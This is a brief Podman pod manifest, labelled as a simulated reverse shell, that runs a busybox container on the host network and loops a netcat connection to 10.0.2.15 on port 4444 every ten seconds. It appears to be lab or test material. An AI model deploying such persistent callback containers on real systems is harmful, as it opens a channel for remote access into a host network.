
# Podman container manifest for a simulated reverse shell
apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell
spec:
  hostNetwork: true
  containers:
    - name: shell
      image: docker.io/library/busybox:latest
      command: ["/bin/sh", "-c"]
      args:
        - >
          while true; do
            nc 10.0.2.15 4444;
            sleep 10;
          done
